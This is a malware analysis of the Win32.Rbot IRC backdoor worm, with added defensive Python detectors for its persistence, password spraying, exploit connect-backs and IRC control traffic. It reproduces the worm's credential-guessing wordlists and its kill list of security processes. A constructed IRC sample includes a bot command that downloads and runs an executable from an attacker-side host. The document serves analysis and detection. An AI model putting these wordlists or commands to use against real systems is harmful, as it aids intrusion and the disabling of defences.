Description
Win32.Rbot is an IRC-controlled backdoor (or "bot") that gives an attacker unauthorized access to the victim's machine. It can also exhibit worm-like behaviour by guessing weak passwords on administrative shares, by exploiting a range of software vulnerabilities, and by using backdoors left behind by other malware. There are many variants of Rbot, and more are discovered regularly. The family is highly configurable and under very active development, but the core functionality is quite consistent between variants.
Most instances of Rbot are compressed and/or encrypted with one or more run-time executable packers. Examples include Morphine, UPX, ASPack, PESpin, EZIP, PEShield, PECompact, FSG, EXEStealth, PEX, MoleBox and PEtite.
Method of Infection
When first run, Rbot copies itself into the %System% directory. The file name is configured separately for each variant; a common example is "wuamgrd.exe", and some variants use a different, randomly generated file name each time they install. The worm sets the read-only, hidden and system attributes on the copy and sets its date/time to match that of the system file "explorer.exe", so that the new file does not stand out in a directory listing sorted by date.
The worm most commonly adds entries to the following registry keys so that it is automatically run each time Windows starts:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
The value name is also configurable, therefore it can be different for each variant. For example:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Machine = "wuamgrd.exe"
The worm may be configured to regularly check these values and re-set them if necessary.
Rbot will usually create a mutex to ensure only one copy runs at a time. The mutex name changes from one variant to the next. One observed example is "rxlsass01b".
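The persistence traits described above (an autorun value naming a file in %System%, the read-only/hidden/system attribute set, and a last-write time cloned from explorer.exe) can be checked together. The following is an added triage example, not code from the original analysis: it parses a constructed "reg export" style dump of the three autorun keys and a constructed table of file metadata. The install path, the example value names, the legitimate entries and the scoring threshold are assumptions for illustration; only the wuamgrd.exe example and the key names come from the text.

```python
import re
from datetime import datetime

# The three autorun keys the text lists (compared case-insensitively).
# RunServices is a Win9x/ME key, but Rbot writes it regardless, so it is
# worth reading on NT-family hosts too.
AUTORUN_KEYS = {
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\runservices",
}
SYSTEM_DIR = r"c:\windows\system32"     # %System%; assumed install layout
EXPLORER = r"c:\windows\explorer.exe"   # file whose last-write time Rbot clones

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^"(.+?)"="(.*)"$')

# Constructed sample dump. Only "Microsoft Update Machine" = wuamgrd.exe is
# from the text; the other two entries are made-up benign autoruns.
SAMPLE_REG_EXPORT = r"""
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Update Machine"="wuamgrd.exe"
"SecurityHealth"="C:\\Program Files\\Windows Defender\\MSASCuiL.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Microsoft Update Machine"="wuamgrd.exe"
"""

# Constructed file metadata: DOS attributes (R/H/S) and last-write time,
# as a stat of each candidate would report them.
SAMPLE_FILES = {
    EXPLORER: {"attrs": set(), "mtime": datetime(2004, 8, 4, 12, 0, 0)},
    r"c:\windows\system32\wuamgrd.exe": {"attrs": {"R", "H", "S"},
                                        "mtime": datetime(2004, 8, 4, 12, 0, 0)},
}


def parse_reg_export(text):
    """Return [(key, value_name, data)] for every value under an autorun key,
    with reg-export escaping (\\\\ and \\") undone."""
    entries, key = [], None
    for line in text.splitlines():
        line = line.strip()
        m = _KEY_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = _VAL_RE.match(line)
        if m and key and key.lower() in AUTORUN_KEYS:
            data = m.group(2).replace("\\\\", "\\").replace('\\"', '"')
            entries.append((key, m.group(1), data))
    return entries


def image_path(data):
    """Pull the executable path out of a Run value (drop quotes and arguments).
    A bare file name, as in the wuamgrd.exe example, is assumed to resolve to
    %System% through the search path."""
    data = data.strip()
    if data.startswith('"'):
        path = data[1:data.find('"', 1)]
    else:
        i = data.lower().find(".exe")
        path = data[:i + 4] if i >= 0 else data.split(" ")[0]
    if "\\" not in path:
        path = SYSTEM_DIR + "\\" + path
    return path.lower()


def score_entry(name, data, files, all_entries):
    """Collect the traits from the text that one autorun value exhibits."""
    path = image_path(data)
    meta = files.get(path)
    ref = files.get(EXPLORER)
    reasons = []
    if "\\" not in data:
        reasons.append("bare file name in autorun value")
    if path.startswith(SYSTEM_DIR):
        reasons.append("image lives in %System%")
    if meta and {"R", "H", "S"} <= meta["attrs"]:
        reasons.append("read-only+hidden+system attributes set")
    if meta and ref and meta["mtime"] == ref["mtime"]:
        reasons.append("last-write time cloned from explorer.exe")
    copies = sum(1 for _, n, d in all_entries if n == name and image_path(d) == path)
    if copies > 1:
        reasons.append("same value repeated in %d autorun keys" % copies)
    return path, reasons


def triage(reg_text, files, min_indicators=3):
    """Map image path -> reasons for every autorun entry showing at least
    min_indicators traits. A legitimate bare 'ctfmon.exe' scores 2; the
    file-system traits are what separate a dropped copy from that."""
    hits = {}
    entries = parse_reg_export(reg_text)
    for _, name, data in entries:
        path, reasons = score_entry(name, data, files, entries)
        if len(reasons) >= min_indicators:
            hits[path] = reasons
    return hits


if __name__ == "__main__":
    for path, reasons in triage(SAMPLE_REG_EXPORT, SAMPLE_FILES).items():
        print(path, "->", "; ".join(reasons))
```

The file name is deliberately not part of the score, because the text says it is per-variant and may be random; the attribute set and the cloned explorer.exe timestamp are the stable traits, and a value that appears in more than one of the three keys is a further hint.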
Method of Distribution
Win32.Rbot variants are able to spread in a number of different ways. Propagation is launched manually through backdoor control, rather than happening automatically. Not all variants support all propagation mechanisms.
Each spreading method begins with scanning for target machines. The worm can generate random values for all or part of each IP address it targets. Each attack vector is associated with a particular TCP port.
Via Network Shares (TCP ports 139 and 445)
Rbot can infect remote machines through Windows file sharing. It scans for target machines by probing TCP ports 139 and 445. If it can connect to either of these ports, it then tries to connect to the Windows share:
\\<target>\ipc$
Where <target> is the name or IP address of the machine it is trying to infect.
If this connection is not successful, it gives up on this machine. If the connection succeeds, it then attempts to retrieve a list of user names on the target, then use these user names to gain access to the system. If it cannot retrieve the list of user names, it falls back on a default list that it carries within itself, for example:
administrator
administrador
administrateur
administrat
admins
admin
staff
root
computer
owner
student
teacher
wwwadmin
guest
default
database
dba
oracle
db2
Note: Rbot may also try to access a remote machine using the credentials of the local account from which it is executed.
For each user name, it attempts to authenticate using several passwords stored within the worm. The password list can vary. For example:
007 1 12 123 1234 12345 123456 1234567 12345678 123456789 1234567890 2000 2001 2002 2003 2004 access accounting accounts adm admin administrador administrat administrateur administrator admins asd backup bill bitch blank bob bob brian changeme chris cisco compaq control data database databasepass databasepassword db1 db1234 db2 dbpass dbpassword default dell demo domain domainpass domainpassword eric exchange fred fuck george god guest hell hello home homeuser hp ian ibm internet internet
intranet jen joe john kate katie lan lee linux login loginpass luke mail main mary mike neil nokia none null oainstall oem oeminstall oemuser office oracle orainstall outlook pass pass1234 passwd password password1 peter peter pwd qaz qwe qwerty root sa sam server sex siemens slut sql sqlpass staff student sue susan system teacher technical test unix user web win2000 win2k win98 windows winnt winpass winxp www xp zxc
The list usually includes an empty password.
Assuming the worm can authenticate with the target machine, it then tries to copy itself to these locations:
\\<target>\Admin$\system32
\\<target>\c$\winnt\system32
\\<target>\c$\windows\system32
\\<target>\c
\\<target>\d
It then schedules a remote job to run the worm copy on the target machine.
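On the target side, the share-spreading routine above leaves a recognisable trace: a burst of failed network logons (Security event 4625, logon type 3) from one source against many account names, frequently followed by a successful network logon (4624) from the same source. The following detection logic is an added example, not part of the original analysis, and runs over a constructed set of log records rather than a real event log. The window and threshold values, the source addresses and the user "alice" are assumptions; the fallback account list is the one quoted above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Account names the text says Rbot falls back to when it cannot enumerate users.
RBOT_DEFAULT_USERS = {
    "administrator", "administrador", "administrateur", "administrat", "admins",
    "admin", "staff", "root", "computer", "owner", "student", "teacher",
    "wwwadmin", "guest", "default", "database", "dba", "oracle", "db2",
}
WINDOW = timedelta(seconds=60)   # tuning assumptions for a small network:
MIN_FAILURES = 10                # this many network-logon failures ...
MIN_USERS = 3                    # ... spread over at least this many accounts


def make_event(ts, event_id, user, ip, logon_type=3):
    """Minimal stand-in for a Security log record: 4625 = failed logon,
    4624 = successful logon; logon type 3 = network (SMB) logon."""
    return {"ts": ts, "id": event_id, "user": user.lower(), "ip": ip,
            "logon_type": logon_type}


def constructed_events():
    """Constructed sample: a spray from 10.0.0.5 followed by a success, and a
    user at 10.0.0.9 mistyping a password twice before logging in."""
    t0 = datetime(2005, 3, 1, 2, 14, 0)
    events, n = [], 0
    for user in ["administrator", "admin", "root", "guest", "oracle", "dba"]:
        for _ in range(4):   # four guesses per account; the guess itself is never logged
            events.append(make_event(t0 + timedelta(seconds=n), 4625, user, "10.0.0.5"))
            n += 1
    events.append(make_event(t0 + timedelta(seconds=n), 4624, "administrator", "10.0.0.5"))
    events.append(make_event(t0 + timedelta(minutes=5), 4625, "alice", "10.0.0.9"))
    events.append(make_event(t0 + timedelta(minutes=5, seconds=4), 4625, "alice", "10.0.0.9"))
    events.append(make_event(t0 + timedelta(minutes=5, seconds=9), 4624, "alice", "10.0.0.9"))
    return events


def detect_spray(events):
    """Return {source_ip: finding} for every source whose network-logon
    failures inside one WINDOW reach MIN_FAILURES across MIN_USERS accounts."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["logon_type"] == 3:
            by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["id"] == 4625]
        for i, first in enumerate(fails):
            win = [e for e in fails[i:] if e["ts"] - first["ts"] <= WINDOW]
            users = {e["user"] for e in win}
            if len(win) < MIN_FAILURES or len(users) < MIN_USERS:
                continue
            end = win[-1]["ts"]
            # A success from the same source right after the burst is the
            # signal that one of the guesses worked.
            success = [e["user"] for e in evs
                       if e["id"] == 4624 and end <= e["ts"] <= end + WINDOW]
            findings[ip] = {
                "failures": len(win),
                "users": sorted(users),
                "rbot_default_overlap": len(users & RBOT_DEFAULT_USERS) / len(users),
                "success_after_spray": success,
            }
            break
    return findings


if __name__ == "__main__":
    for ip, finding in detect_spray(constructed_events()).items():
        print(ip, finding)
```

The overlap with the fallback account list is only a hint (the worm prefers names it enumerates from the target), but a high value together with a success from the same source, and a remote job scheduled from that source shortly afterwards, is the sequence this section describes. The same password list is reused against MS SQL "sa", "root" and "admin" accounts (see the exploit list below), so the same window logic applies to SQL login-failure events.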
Via Exploits
Win32.Rbot can also spread by exploiting vulnerabilities in Windows operating systems and third-party applications. If it successfully exploits one of these, it executes a small piece of code on the target machine that instructs the target to connect back to the source and retrieve the complete worm executable. These connections back to the source use either TFTP or HTTP; the infecting machine runs its own TFTP or HTTP server to deliver the file. The ports used for these servers are configurable, but are often 81 for HTTP and 69 for TFTP.
This is a list of known vulnerabilities that Rbot may exploit:
1. Microsoft Windows LSASS buffer overflow vulnerability (TCP port 445)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?id=27886
http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
2. Microsoft Windows ntdll.dll buffer overflow vulnerability (WebDav vulnerability) (TCP port 80)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=7287
http://www.microsoft.com/technet/security/bulletin/MS03-007.mspx
3. Microsoft Windows RPC malformed message buffer overflow vulnerability (TCP ports 135, 445, 1025)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=25454
http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx (supersedes original bulletin MS03-026)
4. Microsoft Windows RPCSS malformed DCOM message buffer overflow vulnerabilities (TCP port 135)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=25975
http://www.microsoft.com/technet/security/bulletin/MS03-039.mspx
5. Exploiting weak passwords on MS SQL servers, including the Microsoft SQL Server Desktop Engine blank 'sa' password vulnerability (TCP port 1433)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=5705
http://support.microsoft.com/default.aspx?scid=kb;en-us;Q321081
Note: The worm tries the same password list as that used for spreading through shares, including a blank password. The SQL server accounts it attempts to log in to are "sa", "root" and "admin".
6. Microsoft Universal Plug and Play (UPnP) NOTIFY directive buffer overflow and DoS vulnerabilities (TCP port 5000)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=4520
http://www.microsoft.com/technet/security/bulletin/ms01-059.mspx
7. DameWare Mini Remote Control Buffer Overflow (TCP port 6129)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=26843
http://www.dameware.com/support/security/bulletin.asp?ID=SB2
8. Microsoft Windows Workstation service malformed message buffer overflow vulnerability (TCP port 445)
http://www3.ca.com/threatinfo/vulninfo/vuln.aspx?ID=26580
http://www.microsoft.com/technet/security/bulletin/MS03-049.mspx
9. Microsoft Windows WINS replication packet memory overwrite vulnerability (TCP port 42)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=31982
http://www.microsoft.com/technet/security/Bulletin/MS04-045.mspx
10. RealSystem Server SETUP buffer overflow vulnerability
http://www3.ca.com/securityadvisor/vulninfo/Vuln.aspx?ID=7168
11. Microsoft SQL Server 2000 Resolution Service buffer overflow vulnerability (UDP port 1434)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?ID=6251
http://www.microsoft.com/technet/security/bulletin/ms02-061.mspx
12. Microsoft Windows Plug and Play service buffer overflow vulnerability (TCP port 445)
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33250
http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
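Whatever the exploit, the delivery step is the same: an inbound connection to one of the vulnerable service ports, then a new connection from the target back to the source to fetch the worm, often on 69/udp (TFTP) or 81/tcp (HTTP). That pairing is visible in connection or flow logs without any knowledge of the exploit itself. The following is an added example, not part of the original analysis: it correlates a constructed set of flow records, distinguishing a genuine connect-back from the reply half of the triggering connection that unidirectional flow exports also record. The addresses, the 30-second window and the port-to-vector labels are assumptions; the port numbers are the ones given in the list above.

```python
from collections import namedtuple
from datetime import datetime, timedelta

Flow = namedtuple("Flow", "ts src sport dst dport proto")

# Ports the exploit vectors in the list above arrive on (labels are a summary).
EXPLOIT_PORTS = {
    445: "SMB (LSASS / Workstation / PnP)", 135: "RPC DCOM", 1025: "RPC",
    80: "WebDAV ntdll", 1433: "MSSQL weak sa", 5000: "UPnP",
    6129: "DameWare", 42: "WINS", 1434: "SQL Resolution Service",
}
# Retrieval ports the text says the worm commonly serves itself on.
FETCH_PORTS = {("udp", 69): "tftp", ("tcp", 81): "http"}
CONNECT_BACK_WINDOW = timedelta(seconds=30)   # assumed; payload fetch is immediate


def constructed_flows():
    """Constructed flow log: two successful infections from 10.0.0.5, one
    failed attempt, normal SMB use, and an ordinary web request with its reply."""
    t0 = datetime(2005, 3, 1, 3, 0, 0)

    def at(sec, src, sport, dst, dport, proto):
        return Flow(t0 + timedelta(seconds=sec), src, sport, dst, dport, proto)

    return [
        at(0, "10.0.0.5", 3891, "10.0.0.22", 445, "tcp"),    # exploit over SMB
        at(2, "10.0.0.22", 1044, "10.0.0.5", 69, "udp"),     # victim fetches via TFTP
        at(5, "10.0.0.5", 3892, "10.0.0.23", 135, "tcp"),    # DCOM exploit
        at(6, "10.0.0.23", 1045, "10.0.0.5", 81, "tcp"),     # victim fetches via HTTP/81
        at(9, "10.0.0.5", 3893, "10.0.0.24", 1433, "tcp"),   # attempt with no connect-back
        at(40, "10.0.0.30", 2222, "10.0.0.5", 445, "tcp"),   # plain file-share access
        at(100, "10.0.0.31", 3000, "10.0.0.40", 80, "tcp"),  # web request ...
        at(101, "10.0.0.40", 80, "10.0.0.31", 3000, "tcp"),  # ... and its reply flow
    ]


def detect_connect_back(flows):
    """Pair every inbound flow to an exploit port with a new connection from
    the target back to the source inside CONNECT_BACK_WINDOW."""
    flows = sorted(flows, key=lambda f: f.ts)
    findings = []
    for trig in flows:
        if trig.dport not in EXPLOIT_PORTS:
            continue
        for cb in flows:
            if cb.ts < trig.ts or cb.ts - trig.ts > CONNECT_BACK_WINDOW:
                continue
            if cb.src != trig.dst or cb.dst != trig.src:
                continue
            if (cb.sport, cb.dport) == (trig.dport, trig.sport):
                continue   # the reply half of the trigger connection, not a new one
            findings.append({
                "attacker": trig.src, "victim": trig.dst,
                "vector": EXPLOIT_PORTS[trig.dport],
                "fetch": FETCH_PORTS.get((cb.proto, cb.dport),
                                         "port %d/%s" % (cb.dport, cb.proto)),
                "delay_s": (cb.ts - trig.ts).total_seconds(),
            })
    return findings


if __name__ == "__main__":
    for finding in detect_connect_back(constructed_flows()):
        print(finding)
```

Because the server ports are configurable, the fetch port is reported but not required to be 69 or 81: any fresh connection from the just-attacked host back to the attacker within seconds of the exploit is the pattern, and a workstation running a TFTP or HTTP listener at all is itself worth an alert.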
Via Other Malware
Some Rbot variants can also infect remote systems through backdoors created by other malware:
Note: some of the above trojans listen on variable ports. Known variants of Win32.Rbot use only the default ports as listed above.
Payload
Backdoor Functionality
Rbot's main function is to act as an IRC controlled backdoor. It attempts to connect to a predefined IRC server and join a specific channel so that the victim's computer can be controlled. The IRC server, port number, channel and password differ with each variant.
Rbot also listens on TCP port 113 to answer ident (auth) requests, which some IRC servers require before accepting a connection.
Once the victim's computer is under control, the controller can instruct Win32.Rbot to attempt propagation, for example via administrative shares with weak passwords or via the DCOM RPC exploit. The backdoor can also be instructed to:
- download and execute files from the Internet
- retrieve system information such as Operating System details
- retrieve CD keys for certain computer games, if present
- start a SOCKS proxy
- perform denial of service (DoS) attacks
- start several other servers: rlogin, http, tftp. The ports used for these are configurable.
- log keystrokes
- capture video from a webcam, if present
- send e-mail
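The control channel is plain IRC, so a capture of the bot's session can be reduced to the handful of facts an analyst needs: the nick the bot registered, the channel and channel key it joined, who issued commands, and any URLs those commands carried (a download from port 81 ties back to the HTTP server described under "Via Exploits"). The following parser is an added example, not code from the original analysis. The session it reads is constructed: the server name, nick, channel, key, command names and the "." and "!" command prefixes are assumptions for illustration, and treating the channel topic as a command carrier is also an assumption, not something this page describes.

```python
import re

COMMAND_PREFIXES = (".", "!")   # assumed bot-command prefixes; configurable per variant

# Constructed capture: ">" is bot -> server, "<" is server -> bot.
SESSION = [
    (">", "NICK [USA|XP]-123456"),
    (">", "USER xyz 0 0 :xyz"),
    ("<", ":irc.example.net 001 [USA|XP]-123456 :Welcome"),
    ("<", "PING :irc.example.net"),
    (">", "PONG :irc.example.net"),
    (">", "JOIN #rx r0x0r"),
    ("<", ":irc.example.net 332 [USA|XP]-123456 #rx :.scan 445 10.0.0.0 200"),
    ("<", ":boss!op@host PRIVMSG #rx :.login p4ss"),
    ("<", r":boss!op@host PRIVMSG #rx :.download http://10.0.0.5:81/wuamgrd.exe c:\wuamgrd.exe 1"),
    (">", "PRIVMSG #rx :downloading http://10.0.0.5:81/wuamgrd.exe"),
    ("<", ":someone!u@h PRIVMSG #rx :hi there"),
]


def parse_irc_line(line):
    """Split one IRC protocol line (RFC 1459 framing) into
    (prefix or None, COMMAND, [params...]); a trailing ':' parameter may
    contain spaces and becomes the last element."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        head, _, trailing = line.partition(" :")
        params = head.split() + [trailing]
    else:
        params = line.split()
    return prefix, params[0].upper(), params[1:]


def summarize_session(tagged_lines):
    """Extract the C2 facts from a (direction, line) capture of a bot session."""
    info = {"nick": None, "channel": None, "key": None,
            "operators": set(), "commands": [], "urls": []}
    for direction, raw in tagged_lines:
        prefix, cmd, params = parse_irc_line(raw)
        if direction == ">" and cmd == "NICK" and params:
            info["nick"] = params[0]
        elif direction == ">" and cmd == "JOIN" and params:
            info["channel"] = params[0]
            info["key"] = params[1] if len(params) > 1 else None   # channel password
        elif direction == "<" and cmd == "PRIVMSG" and len(params) == 2:
            text = params[1]
            if text.startswith(COMMAND_PREFIXES):
                sender = prefix.split("!")[0] if prefix else "?"
                info["operators"].add(sender)
                info["commands"].append((sender, text))
        elif direction == "<" and cmd == "332" and len(params) == 3:
            # RPL_TOPIC, shown to the bot on join. Assumed here to be a
            # command carrier too; the text itself does not describe this.
            if params[2].startswith(COMMAND_PREFIXES):
                info["commands"].append(("topic", params[2]))
    for _, text in info["commands"]:
        info["urls"] += re.findall(r"(?:https?|tftp)://\S+", text)
    return info


if __name__ == "__main__":
    for k, v in summarize_session(SESSION).items():
        print(k, v)
```

Only lines in the server-to-bot direction are treated as commands, so the bot's own status reports in the channel are not mistaken for operator input; the JOIN key is the per-variant channel password mentioned above and is usually the quickest way to tell two variants apart.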
Process Termination
Win32.Rbot can also be configured to terminate certain processes. These processes are usually related to anti-virus and other security software, but also include processes used by other malware. For example:
regedit.exe
msconfig.exe
netstat.exe
msblast.exe
zapro.exe
navw32.exe
navapw32.exe
zonealarm.exe
wincfg32.exe
taskmon.exe
PandaAVEngine.exe
sysinfo.exe
mscvb32.exe
MSBLAST.exe
teekids.exe
Penis32.exe
bbeagle.exe
SysMonXP.exe
winupd.exe
winsys.exe
ssate.exe
rate.exe
d3dupdate.exe
irun4.exe
i11r54n4.exe
Analysis by Hamish O'Dea